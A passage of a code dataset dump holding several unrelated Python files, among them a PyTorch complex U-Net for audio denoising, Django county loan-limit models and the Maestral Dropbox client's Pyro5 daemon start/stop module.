enum_reference_types=[\"ConceptMap\"],\n )\n url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_url\", title=\"Extension field for ``url``.\"\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupUnmapped`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"mode\",\n \"code\",\n \"display\",\n \"url\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_2520(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. 
In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"mode\", \"mode__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n","sub_path":"fhir/resources/R4B/conceptmap.py","file_name":"conceptmap.py","file_ext":"py","file_size_in_byte":45816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157753147","text":"\"\"\" Gliffy Backup User Interface\n @author: Jean-Lou Dupont\n\"\"\"\n\n__author__ = \"Jean-Lou Dupont\"\n__version__ = \"$Id: gliffy_ui.py 795 2009-01-13 19:42:53Z JeanLou.Dupont $\"\n\nimport jld.tools.cmd_ui as ui\n\nclass Gliffy_UI(ui.UIBase):\n \"\"\" Handles user interface\n \"\"\"\n _map = {\n 'jld.api.ErrorConfig': { 'msg': 'error_config', 'help': 'help_config', },\n 'jld.api.ErrorDb': { 'msg': 'error_db', 'help': 'help_db', },\n 'jld.api.ErrorAuth': { 'msg': 'error_auth', 'help': 'help_auth', },\n 'jld.api.ErrorNetwork': { 'msg': 'error_network', 'help': 'help_network', },\n 'jld.api.ErrorAccess': { 'msg': 'error_access', 'help': 'help_access', },\n 'jld.api.ErrorMethod': { 'msg': 'error_method', 'help': 'help_method', },\n 'jld.api.ErrorValidation': { 'msg': 'error_validation','help': 'help_validation', },\n 'jld.api.ErrorProtocol': { 'msg': 'error_protocol', 'help': 'help_protocol', },\n 'jld.api.ErrorInvalidCommand': { 'msg': 'error_command', 'help': 'help_command', },\n 'jld.registry.exception.RegistryException':{ 'msg': 'error_registry', 'help_win': 'help_registry_win', 'help_nix':'help_registry_nix' },\n }\n ","sub_path":"trunk/libs/python/jld/jld/backup/gliffy_ui.py","file_name":"gliffy_ui.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568302814","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\n\n\nclass CConv2d(nn.Module):\n \"\"\"\n Class of complex valued convolutional layer\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding=0):\n 
super().__init__()\n\n        self.in_channels = in_channels\n        self.out_channels = out_channels\n        self.kernel_size = kernel_size\n        self.padding = padding\n        self.stride = stride\n\n        self.real_conv = nn.Conv2d(in_channels=self.in_channels,\n                                   out_channels=self.out_channels,\n                                   kernel_size=self.kernel_size,\n                                   padding=self.padding,\n                                   stride=self.stride)\n\n        self.im_conv = nn.Conv2d(in_channels=self.in_channels,\n                                 out_channels=self.out_channels,\n                                 kernel_size=self.kernel_size,\n                                 padding=self.padding,\n                                 stride=self.stride)\n\n        # Glorot initialization.\n        nn.init.xavier_uniform_(self.real_conv.weight)\n        nn.init.xavier_uniform_(self.im_conv.weight)\n\n    def forward(self, x):\n        x_real = x[..., 0]\n        x_im = x[..., 1]\n\n        c_real = self.real_conv(x_real) - self.im_conv(x_im)\n        c_im = self.im_conv(x_real) + self.real_conv(x_im)\n\n        output = torch.stack([c_real, c_im], dim=-1)\n        return output\n\n\nclass CConvTranspose2d(nn.Module):\n    \"\"\"\n    Class of complex valued transposed convolutional layer\n    \"\"\"\n\n    def __init__(self, in_channels, out_channels, kernel_size, stride, output_padding=0, padding=0):\n        super().__init__()\n\n        self.in_channels = in_channels\n\n        self.out_channels = out_channels\n        self.kernel_size = kernel_size\n        self.output_padding = output_padding\n        self.padding = padding\n        self.stride = stride\n\n        self.real_convt = nn.ConvTranspose2d(in_channels=self.in_channels,\n                                             out_channels=self.out_channels,\n                                             kernel_size=self.kernel_size,\n                                             output_padding=self.output_padding,\n                                             padding=self.padding,\n                                             stride=self.stride)\n\n        self.im_convt = nn.ConvTranspose2d(in_channels=self.in_channels,\n                                           out_channels=self.out_channels,\n                                           kernel_size=self.kernel_size,\n                                           output_padding=self.output_padding,\n                                           padding=self.padding,\n                                           stride=self.stride)\n\n        # Glorot initialization.\n        nn.init.xavier_uniform_(self.real_convt.weight)\n        nn.init.xavier_uniform_(self.im_convt.weight)\n\n    def forward(self, x):\n        x_real = x[..., 0]\n        x_im = x[..., 1]\n\n        ct_real = self.real_convt(x_real) - self.im_convt(x_im)\n        ct_im = self.im_convt(x_real) + self.real_convt(x_im)\n\n        output = torch.stack([ct_real, ct_im], dim=-1)\n        return output\n\n\nclass CBatchNorm2d(nn.Module):\n    \"\"\"\n    Class of complex valued batch normalization layer\n    \"\"\"\n\n    def __init__(self, num_features, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True):\n        super().__init__()\n\n        self.num_features = num_features\n        self.eps = eps\n        self.momentum = momentum\n        self.affine = affine\n        self.track_running_stats = track_running_stats\n\n        self.real_b = nn.BatchNorm2d(num_features=self.num_features, eps=self.eps, momentum=self.momentum,\n                                     affine=self.affine, track_running_stats=self.track_running_stats)\n        self.im_b = nn.BatchNorm2d(num_features=self.num_features, eps=self.eps, momentum=self.momentum,\n                                   affine=self.affine, track_running_stats=self.track_running_stats)\n\n    def forward(self, x):\n        x_real = x[..., 0]\n        x_im = x[..., 1]\n\n        n_real = self.real_b(x_real)\n        n_im = self.im_b(x_im)\n\n        output = torch.stack([n_real, n_im], dim=-1)\n        return output\n\n\nclass Encoder(nn.Module):\n    \"\"\"\n    Class of downsample block\n    \"\"\"\n\n    def __init__(self, filter_size=(7, 5), stride_size=(2, 2), in_channels=1, out_channels=45, padding=(0, 0)):\n        super().__init__()\n\n        self.filter_size = filter_size\n        self.stride_size = stride_size\n        self.in_channels = in_channels\n        self.out_channels = out_channels\n        self.padding = padding\n\n        self.cconv = CConv2d(in_channels=self.in_channels, out_channels=self.out_channels,\n                             kernel_size=self.filter_size, stride=self.stride_size, 
padding=self.padding)\n\n        self.cbn = CBatchNorm2d(num_features=self.out_channels)\n\n        self.leaky_relu = nn.LeakyReLU()\n\n    def forward(self, x):\n        conved = self.cconv(x)\n        normed = self.cbn(conved)\n        acted = self.leaky_relu(normed)\n\n        return acted\n\n\nclass Decoder(nn.Module):\n    \"\"\"\n    Class of upsample block\n    \"\"\"\n\n    def __init__(self, filter_size=(7, 5), stride_size=(2, 2), in_channels=1, out_channels=45,\n                 output_padding=(0, 0), padding=(0, 0), last_layer=False):\n        super().__init__()\n\n        self.filter_size = filter_size\n        self.stride_size = stride_size\n        self.in_channels = in_channels\n        self.out_channels = out_channels\n        self.output_padding = output_padding\n        self.padding = padding\n\n        self.last_layer = last_layer\n\n        self.cconvt = CConvTranspose2d(in_channels=self.in_channels, out_channels=self.out_channels,\n                                       kernel_size=self.filter_size, stride=self.stride_size,\n                                       output_padding=self.output_padding, padding=self.padding)\n\n        self.cbn = CBatchNorm2d(num_features=self.out_channels)\n\n        self.leaky_relu = nn.LeakyReLU()\n\n    def forward(self, x):\n\n        conved = self.cconvt(x)\n\n        if not self.last_layer:\n            normed = self.cbn(conved)\n            output = self.leaky_relu(normed)\n        else:\n            m_phase = conved / (torch.abs(conved) + 1e-8)\n            m_mag = torch.tanh(torch.abs(conved))\n            output = m_phase * m_mag\n\n        return output\n\n\nclass DCUnet10(nn.Module):\n    \"\"\"\n    Deep Complex U-Net model.\n    \"\"\"\n\n    def __init__(self, n_fft=64, hop_length=16):\n        super().__init__()\n\n        # for istft\n        self.n_fft = n_fft\n        self.hop_length = hop_length\n\n        # downsampling/encoding\n        self.downsample0 = Encoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=1, out_channels=45)\n        self.downsample1 = Encoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=45, out_channels=90)\n        self.downsample2 = Encoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=90, out_channels=90)\n        self.downsample3 = Encoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=90, out_channels=90)\n        self.downsample4 = Encoder(filter_size=(5, 3), stride_size=(2, 1), in_channels=90, out_channels=90)\n\n        # upsampling/decoding\n        self.upsample0 = Decoder(filter_size=(5, 3), stride_size=(2, 1), in_channels=90, out_channels=90)\n        self.upsample1 = Decoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=180, out_channels=90,\n                                 output_padding=(0, 0))\n        self.upsample2 = Decoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=180, out_channels=90)\n        self.upsample3 = Decoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=180, out_channels=45,\n                                 output_padding=(0, 0))\n        self.upsample4 = Decoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=90, output_padding=(0, 1),\n                                 out_channels=1, last_layer=True)\n\n    def forward(self, x, is_istft=True):\n\n        # print(x.shape)\n        x = torch.stft(input=x, n_fft=self.n_fft,\n                       hop_length=self.hop_length, normalized=True)\n        x = x.narrow(2, 0, x.shape[2] - 1)\n        x = x.unsqueeze(1)\n        # print(x.shape)\n\n        # downsampling/encoding\n        d0 = self.downsample0(x)\n        d1 = self.downsample1(d0)\n        d2 = self.downsample2(d1)\n        d3 = self.downsample3(d2)\n        d4 = self.downsample4(d3)\n\n        # upsampling/decoding\n        u0 = self.upsample0(d4)\n        # skip-connection\n        c0 = torch.cat((u0, d3), dim=1)\n\n        u1 = self.upsample1(c0)\n        c1 = torch.cat((u1, d2), dim=1)\n\n        u2 = self.upsample2(c1)\n        c2 = torch.cat((u2, d1), dim=1)\n\n        u3 = self.upsample3(c2)\n        c3 = torch.cat((u3, d0), dim=1)\n\n        u4 = self.upsample4(c3)\n\n        # u4 - the mask\n        if x.shape[3] < u4.shape[3]:\n            x = F.pad(x, (0, 0, 0, 1))\n        if u4.shape[3] < x.shape[3]:\n            x = 
x.narrow(3, 0, u4.shape[3])\n # print(u4.shape, x.shape)\n output = u4 * x\n if is_istft:\n output = torch.squeeze(output, 1)\n output = torch.istft(output, n_fft=self.n_fft, hop_length=self.hop_length, normalized=True)\n\n return output\n","sub_path":"dcunet/dcunet.py","file_name":"dcunet.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"540580021","text":"from django.db import models\nfrom localflavor.us.models import USStateField\nfrom localflavor.us.us_states import STATE_CHOICES\n\n\nabbr_to_name = dict(STATE_CHOICES)\n\n\"\"\" We are using Federal Information Processing Standard (FIPS) state and county codes.\n More information can be found in the following articles:\n http://en.wikipedia.org/wiki/Federal_Information_Processing_Standard_state_code\n http://en.wikipedia.org/wiki/FIPS_county_code \"\"\"\n\n\nclass State(models.Model):\n \"\"\" A basic State object. \"\"\"\n state_fips = models.CharField(max_length=2, help_text='A two-digit FIPS code for the state')\n state_abbr = USStateField(help_text='A two-letter state abbreviation')\n\n def __unicode__(self):\n return u'%s' % abbr_to_name[self.state_abbr]\n\n\nclass County(models.Model):\n \"\"\" A basic state county object. \"\"\"\n county_fips = models.CharField(max_length=3, help_text='A three-digit FIPS code for the state\\'s county')\n county_name = models.CharField(max_length=100, help_text='The county name')\n state = models.ForeignKey(State)\n\n def __unicode__(self):\n return u'%s (%s)' % (self.county_name, self.county_fips)\n\n\nclass CountyLimit(models.Model):\n \"\"\" County limit object. \"\"\"\n fha_limit = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n help_text='Federal Housing Administration loan lending limit for the county')\n gse_limit = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n help_text='Loan limit for mortgages acquired by the Government-Sponsored Enterprises')\n va_limit = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n help_text='The Department of Veterans Affairs loan guaranty program limit')\n county = models.OneToOneField(County)\n\n def __unicode__(self):\n return u'CountyLimit %s' % self.id\n\n @staticmethod\n def county_limits_by_state(state):\n \"\"\" Get a list of state counties with limits. 
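Accepts either a two-digit state FIPS code (e.g. \"06\") or a\n        two-letter state abbreviation (e.g. \"CA\"); both forms are matched below. 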
\"\"\"\n data = []\n # state value can be a State FIPS or a state abbr.\n result = County.objects.filter(models.Q(state__state_fips=state) | models.Q(state__state_abbr=state))\n counties = {}\n state_abbr = ''\n state_fips = ''\n for county in result:\n if not state_abbr:\n state_abbr = county.state.state_abbr\n state_fips = county.state.state_fips\n counties[county.id] = {\n 'county_name': county.county_name,\n 'county_fips': county.county_fips\n }\n\n result = CountyLimit.objects.filter(models.Q(county__state__state_fips=state) | models.Q(county__state__state_abbr=state))\n for countylimit in result:\n data.append({\n 'state': abbr_to_name[state_abbr],\n 'county': counties[countylimit.county_id]['county_name'],\n 'complete_fips': '%s%s' % (state_fips, counties[countylimit.county_id]['county_fips']),\n 'gse_limit': countylimit.gse_limit,\n 'fha_limit': countylimit.fha_limit,\n 'va_limit': countylimit.va_limit,\n })\n return data\n","sub_path":"countylimits/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"620778796","text":"import sys, os\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nc=52\na=np.load('tica_all.npy')\nb=np.arange(0,len(a[c]),1)*0.1\nplt.figure(figsize=(3.3,3))\nplt.plot(a[c][:,0],b,color='black',ms=1,linewidth=0.4)\nplt.xticks(fontsize=6)\nplt.yticks(fontsize=6)\nplt.xlim(-2.1,1.2)\n#plt.savefig('tica1_trace.pdf')\nplt.show()\n","sub_path":"MSM/plot_tICA/plot_trace.py","file_name":"plot_trace.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"425072248","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sam Schott (ss2151@cam.ac.uk)\n\n(c) Sam Schott; This work is licensed under a Creative Commons\nAttribution-NonCommercial-NoDerivs 2.0 UK: England & Wales License.\n\nThis module defines functions to start and stop the sync daemon and retrieve proxy objects\nfor a running daemon.\n\n\"\"\"\n# system imports\nimport sys\nimport os\nimport time\nimport logging\nimport signal\nimport traceback\nimport enum\n\n# external imports\nimport Pyro5.errors\nfrom Pyro5.api import Daemon, Proxy, expose, oneway\nfrom Pyro5.serializers import SerpentSerializer\nfrom lockfile.pidlockfile import PIDLockFile, AlreadyLocked, LockTimeout\n\n# local imports\nfrom maestral.errors import MaestralApiError, SYNC_ERRORS, FATAL_ERRORS\n\n\n_threads = dict()\n\n\nlogger = logging.getLogger(__name__)\nURI = 'PYRO:maestral.{0}@{1}'\n\n\nclass Exit(enum.Enum):\n \"\"\"Enumeration of daemon exit results.\"\"\"\n Ok = 0\n Killed = 1\n NotRunning = 2\n Failed = 3\n\n\nclass Start(enum.Enum):\n \"\"\"Enumeration of daemon start results.\"\"\"\n Ok = 0\n AlreadyRunning = 1\n Failed = 2\n\n\n# ==== error serialization ===============================================================\n\ndef serpent_deserialize_api_error(class_name, d):\n \"\"\"\n Deserializes a :class:`errors.MaestralApiError`.\n\n :param str class_name: Name of class to deserialize.\n :param dict d: Dictionary of serialized class.\n :returns: Class instance.\n :rtype: :class:`errors.MaestralApiError`\n \"\"\"\n # import maestral errors for evaluation\n import maestral.errors # noqa: F401\n\n cls = eval(class_name)\n err = cls(*d['args'])\n for a_name, a_value in d['attributes'].items():\n setattr(err, a_name, a_value)\n\n return err\n\n\nfor err_cls in list(SYNC_ERRORS) + list(FATAL_ERRORS) + 
[MaestralApiError]:\n    SerpentSerializer.register_dict_to_class(\n        err_cls.__module__ + '.' + err_cls.__name__,\n        serpent_deserialize_api_error\n    )\n\n\n# ==== helpers for daemon management =====================================================\n\ndef _sigterm_handler(signal_number, frame):\n    sys.exit()\n\n\ndef _send_term(pid):\n    try:\n        os.kill(pid, signal.SIGTERM)\n    except ProcessLookupError:\n        pass\n\n\ndef _process_exists(pid):\n    try:\n        os.kill(pid, signal.SIG_DFL)\n        return True\n    except ProcessLookupError:\n        return False\n\n\ndef sockpath_for_config(config_name):\n    \"\"\"\n    Returns the unix socket location to be used for the config. This should default to\n    the app's runtime directory + '/maestral/CONFIG_NAME.sock'.\n    \"\"\"\n    from maestral.utils.appdirs import get_runtime_path\n    return get_runtime_path('maestral', config_name + '.sock')\n\n\ndef pidpath_for_config(config_name):\n    from maestral.utils.appdirs import get_runtime_path\n    return get_runtime_path('maestral', config_name + '.pid')\n\n\ndef is_pidfile_stale(pidfile):\n    \"\"\"\n    Determine whether a PID file is stale. Returns ``True`` if the PID file is stale,\n    ``False`` otherwise. The PID file is stale if its contents are valid but do not\n    match the PID of a currently-running process.\n    \"\"\"\n    result = False\n\n    pid = pidfile.read_pid()\n    if pid:\n        return not _process_exists(pid)\n    else:\n        return result\n\n\ndef get_maestral_pid(config_name):\n    \"\"\"\n    Returns Maestral's PID if the daemon is running, ``None`` otherwise.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :returns: The daemon's PID.\n    :rtype: int\n    \"\"\"\n\n    lockfile = PIDLockFile(pidpath_for_config(config_name))\n    pid = lockfile.read_pid()\n\n    if pid and not is_pidfile_stale(lockfile):\n        return pid\n    else:\n        lockfile.break_lock()\n\n\ndef _wait_for_startup(config_name, timeout=8):\n    \"\"\"Waits for the daemon to start and verifies Pyro communication. Returns ``Start.Ok``\n    if startup and communication succeed within timeout, ``Start.Failed`` otherwise.\"\"\"\n    t0 = time.time()\n    pid = None\n\n    logger.debug('Waiting for daemon process to start.')\n\n    while not pid and time.time() - t0 < timeout / 2:\n        pid = get_maestral_pid(config_name)\n        time.sleep(0.2)\n\n    if pid:\n        return _check_pyro_communication(config_name, timeout=int(timeout / 2))\n    else:\n        return Start.Failed\n\n\ndef _check_pyro_communication(config_name, timeout=2):\n    \"\"\"Checks if we can communicate with the maestral daemon. Returns ``Start.Ok`` if\n    communication succeeds within timeout, ``Start.Failed`` otherwise.\"\"\"\n\n    sock_name = sockpath_for_config(config_name)\n    maestral_daemon = Proxy(URI.format(config_name, './u:' + sock_name))\n\n    # wait until we can communicate with daemon, timeout after :param:`timeout`\n    while timeout > 0:\n        try:\n            maestral_daemon._pyroBind()\n            logger.debug('Successfully communicated with daemon')\n            return Start.Ok\n        except Exception:\n            time.sleep(0.2)\n            timeout -= 0.2\n        finally:\n            maestral_daemon._pyroRelease()\n\n    logger.error('Could not communicate with Maestral daemon')\n    return Start.Failed\n\n\n# ==== main functions to manage daemon ===================================================\n\ndef run_maestral_daemon(config_name='maestral', run=True, log_to_stdout=False):\n    \"\"\"\n    Wraps :class:`main.Maestral` as a Pyro daemon object, creates a new instance and starts\n    Pyro's event loop to listen for requests on a unix domain socket. 
This call will block\n    until the event loop shuts down.\n\n    This command will return silently if the daemon is already running.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :param bool run: If ``True``, start syncing automatically. Defaults to ``True``.\n    :param bool log_to_stdout: If ``True``, write logs to stdout. Defaults to ``False``.\n    \"\"\"\n    import threading\n    from maestral.main import Maestral\n\n    sock_name = sockpath_for_config(config_name)\n    pid_name = pidpath_for_config(config_name)\n\n    lockfile = PIDLockFile(pid_name)\n\n    if threading.current_thread() is threading.main_thread():\n        signal.signal(signal.SIGTERM, _sigterm_handler)\n\n    # acquire PID lock file\n\n    try:\n        lockfile.acquire(timeout=1)\n    except (AlreadyLocked, LockTimeout):\n        if is_pidfile_stale(lockfile):\n            lockfile.break_lock()\n        else:\n            logger.debug('Maestral already running')\n            return\n\n    # Nice ourselves to give other processes priority. We will likely only\n    # have significant CPU usage in case of many concurrent downloads.\n    os.nice(10)\n\n    logger.debug(f'Starting Maestral daemon on socket \"{sock_name}\"')\n\n    try:\n        # clean up old socket\n        try:\n            os.remove(sock_name)\n        except FileNotFoundError:\n            pass\n\n        daemon = Daemon(unixsocket=sock_name)\n\n        # expose maestral as Pyro server\n        # convert selected methods to one way calls so that they don't block\n        ExposedMaestral = expose(Maestral)\n\n        ExposedMaestral.stop_sync = oneway(ExposedMaestral.stop_sync)\n        ExposedMaestral.pause_sync = oneway(ExposedMaestral.pause_sync)\n        ExposedMaestral.shutdown_pyro_daemon = oneway(ExposedMaestral.shutdown_pyro_daemon)\n\n        m = ExposedMaestral(config_name, run=run, log_to_stdout=log_to_stdout)\n\n        daemon.register(m, f'maestral.{config_name}')\n        daemon.requestLoop(loopCondition=m._loop_condition)\n        daemon.close()\n    except Exception:\n        traceback.print_exc()\n    except (KeyboardInterrupt, SystemExit):\n        logger.info('Received system exit')\n        sys.exit(0)\n    finally:\n        lockfile.release()\n\n\ndef start_maestral_daemon_thread(config_name='maestral', run=True, log_to_stdout=False):\n    \"\"\"\n    Starts the Maestral daemon in a thread (by calling :func:`run_maestral_daemon`).\n    This command will create a new daemon on each run. Take care not to sync the same\n    directory with multiple instances of Maestral! You can use\n    :func:`get_maestral_pid` to check if a Maestral daemon is\n    already running for the given ``config_name``.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :param bool run: If ``True``, start syncing automatically. Defaults to ``True``.\n    :param bool log_to_stdout: If ``True``, write logs to stdout. Defaults to ``False``.\n    :returns: ``Start.Ok`` if successful, ``Start.AlreadyRunning`` if the daemon was\n        already running or ``Start.Failed`` if startup failed.\n    \"\"\"\n    import threading\n\n    t = threading.Thread(\n        target=run_maestral_daemon,\n        args=(config_name, run, log_to_stdout),\n        name=f'maestral-daemon-{config_name}',\n        daemon=True,\n    )\n    t.start()\n\n    _threads[config_name] = t\n\n    if threading.current_thread() is threading.main_thread():\n        signal.signal(signal.SIGTERM, _sigterm_handler)\n\n    return _wait_for_startup(config_name, timeout=8)\n\n\ndef start_maestral_daemon_process(config_name='maestral', run=True, log_to_stdout=False):\n    \"\"\"\n    Starts the Maestral daemon as a separate process by calling\n    :func:`run_maestral_daemon`.\n\n    .. 
warning::\n        This function assumes that ``sys.executable`` points to the Python executable and\n        will not work, for instance, from PyInstaller executables.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :param bool run: If ``True``, start syncing automatically. Defaults to ``True``.\n    :param bool log_to_stdout: If ``True``, write logs to stdout. Defaults to ``False``.\n    :returns: ``Start.Ok`` if successful, ``Start.AlreadyRunning`` if the daemon was\n        already running or ``Start.Failed`` if startup failed.\n    \"\"\"\n    import subprocess\n    from shlex import quote\n    import multiprocessing as mp\n\n    STD_IN_OUT = subprocess.DEVNULL\n\n    # use nested Popen and multiprocessing.Process to effectively create a double fork\n    # see Unix 'double-fork magic'\n\n    def target(cc, r):\n        cc = quote(cc)\n        r = bool(r)\n\n        cmd = (f'import maestral.daemon; '\n               f'maestral.daemon.run_maestral_daemon(\"{cc}\", {r}, {log_to_stdout})')\n\n        subprocess.Popen(\n            [sys.executable, '-c', cmd],\n            stdin=STD_IN_OUT, stdout=STD_IN_OUT, stderr=STD_IN_OUT,\n        )\n\n    mp.Process(\n        target=target,\n        args=(config_name, run),\n        name='maestral-daemon-launcher',\n        daemon=True,\n    ).start()\n\n    return _wait_for_startup(config_name, timeout=8)\n\n\ndef stop_maestral_daemon_process(config_name='maestral', timeout=10):\n    \"\"\"Stops a maestral daemon process by finding its PID and shutting it down.\n\n    This function first tries to shut down Maestral gracefully. If this fails, it will\n    send SIGTERM. If that fails as well, it will send SIGKILL to the process.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :param float timeout: Number of seconds to wait for the daemon to shut down before killing it.\n    :returns: ``Exit.Ok`` if successful, ``Exit.Killed`` if killed and ``Exit.NotRunning``\n        if the daemon was not running.\n    \"\"\"\n\n    logger.debug('Stopping daemon')\n    lockfile = PIDLockFile(pidpath_for_config(config_name))\n    pid = lockfile.read_pid()\n\n    try:\n        if not pid or not _process_exists(pid):\n            return Exit.NotRunning\n\n        try:\n            with MaestralProxy(config_name) as m:\n                m.stop_sync()\n                m.shutdown_pyro_daemon()\n        except Pyro5.errors.CommunicationError:\n            logger.debug('Could not communicate with daemon, sending SIGTERM')\n            _send_term(pid)\n        finally:\n            logger.debug('Waiting for shutdown')\n            while timeout > 0:\n                if not _process_exists(pid):\n                    logger.debug('Daemon shut down')\n                    return Exit.Ok\n                else:\n                    time.sleep(0.2)\n                    timeout -= 0.2\n\n        # send SIGTERM after timeout and delete PID file\n        _send_term(pid)\n\n        time.sleep(1)\n\n        if not _process_exists(pid):\n            logger.debug('Daemon shut down')\n            return Exit.Ok\n        else:\n            os.kill(pid, signal.SIGKILL)\n            logger.debug('Daemon killed')\n            return Exit.Killed\n    finally:\n        lockfile.break_lock()\n\n\ndef stop_maestral_daemon_thread(config_name='maestral', timeout=10):\n    \"\"\"Stops a maestral daemon thread without killing the parent process.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :param float timeout: Number of seconds to wait for the daemon to shut down.\n    :returns: ``Exit.Ok`` if successful, ``Exit.NotRunning`` if the daemon was not running,\n        ``Exit.Failed`` if it could not be stopped within timeout.\n    \"\"\"\n\n    logger.debug('Stopping thread')\n    lockfile = PIDLockFile(pidpath_for_config(config_name))\n    t = _threads[config_name]\n\n    if not t.is_alive():\n        lockfile.break_lock()\n        return Exit.NotRunning\n\n    # tell maestral daemon to shut down\n    try:\n        with MaestralProxy(config_name) as m:\n            m.stop_sync()\n            
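# stop the sync threads first, then ask the daemon's Pyro event loop to exit\n            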
m.shutdown_pyro_daemon()\n    except Pyro5.errors.CommunicationError:\n        return Exit.Failed\n\n    # wait for maestral to carry out shutdown\n    t.join(timeout=timeout)\n    if t.is_alive():\n        return Exit.Failed\n    else:\n        return Exit.Ok\n\n\ndef get_maestral_proxy(config_name='maestral', fallback=False):\n    \"\"\"\n    Returns a Pyro proxy of a running Maestral instance.\n\n    :param str config_name: The name of the Maestral configuration to use.\n    :param bool fallback: If ``True``, a new instance of Maestral will be returned when\n        the daemon cannot be reached. Defaults to ``False``.\n    :returns: Pyro proxy of Maestral or a new instance.\n    :raises: :class:`Pyro5.errors.CommunicationError` if the daemon cannot be reached and\n        ``fallback`` is ``False``.\n    \"\"\"\n\n    pid = get_maestral_pid(config_name)\n\n    if pid:\n        sock_name = sockpath_for_config(config_name)\n\n        sys.excepthook = Pyro5.errors.excepthook\n        maestral_daemon = Proxy(URI.format(config_name, './u:' + sock_name))\n        try:\n            maestral_daemon._pyroBind()\n            return maestral_daemon\n        except Pyro5.errors.CommunicationError:\n            maestral_daemon._pyroRelease()\n\n    if fallback:\n        from maestral.main import Maestral\n        m = Maestral(config_name, run=False)\n        m.log_handler_stream.setLevel(logging.CRITICAL)\n        return m\n    else:\n        raise Pyro5.errors.CommunicationError\n\n\nclass MaestralProxy(object):\n    \"\"\"A context manager to open and close a proxy to the Maestral daemon.\"\"\"\n\n    def __init__(self, config_name='maestral', fallback=False):\n        self.m = get_maestral_proxy(config_name, fallback)\n\n    def __enter__(self):\n        return self.m\n\n    def __exit__(self, exc_type, exc_value, tb):\n        if isinstance(self.m, Proxy):\n            self.m._pyroRelease()\n\n        del self.m\n","sub_path":"maestral/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":15083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"257979564","text":"import os\r\nimport math\r\nimport pygame\r\nimport pygame.gfxdraw\r\nimport numpy as np\r\n\r\n\r\nclass Object:\r\n    def __init__(self):\r\n        self.vars = {}\r\n        self.childs = {}\r\n\r\n    def Set(self, name, value):\r\n        self.vars[name] = value\r\n\r\n    def Get(self, name):\r\n        if name in self.vars:\r\n            return self.vars[name]\r\n        return None\r\n\r\n    def RenderAll(self, display):\r\n        for key in self.childs:\r\n            self.childs[key].Render(display)\r\n            self.childs[key].RenderAll(display)\r\n\r\n    def UpdateAll(self, display):\r\n        for key in self.childs:\r\n            self.childs[key].Update(display)\r\n            self.childs[key].UpdateAll(display)\r\n\r\n    def AddChild(self, *args):\r\n        for arg in args:\r\n            self.childs[arg[\"name\"]] = arg\r\n            arg.Set(\"parent\", self)\r\n\r\n    def GetChild(self, name):\r\n        if name in self.childs:\r\n            return self.childs[name]\r\n        return None\r\n\r\n    def 